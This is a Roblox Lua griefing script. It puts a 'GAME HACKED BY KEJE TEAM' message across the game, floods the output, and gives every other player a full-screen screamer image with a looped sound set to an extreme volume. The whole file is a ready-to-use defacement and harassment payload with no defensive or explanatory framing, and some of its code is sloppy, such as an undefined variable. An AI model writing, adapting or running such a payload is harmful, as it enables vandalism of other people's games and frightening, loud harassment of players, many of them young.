-- Hint and gui
local lmao = Instance.new("Hint")
lmao.Parent = Workspace
lmao.Text = "GAME HACKED BY KEJE TEAM"

local wordToRepeat = "GAME HACKED BY KEJE TEAM" 

for i = 1, 1000 do
	print(wordToRepeat)
end

for i,v in pairs(game.Players:GetPlayers()) do
	if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
		spawn(function()
			local newgui = Instance.new("ScreenGui",v.PlayerGui)
			newgui.Name = "Screamer"
			local newimage = Instance.new("ImageLabel",newgui)
			newimage.Image = "http://www.roblox.com/asset/?id=127753178157932"
			newimage.Size = UDim2.new(1,1,1,1)
			local s = Instance.new("Sound",newgui)
			s.SoundId = "rbxassetid://4765507378"
			s.Volume = 9999999999999999999999999999999999999
			s.Looped = true
			s:Play()
			print("Screamed "..v.Name)
			while wait(1000000000000000000000000) do

				newimage.Parent:Destroy()

			end
		end)
	end
end
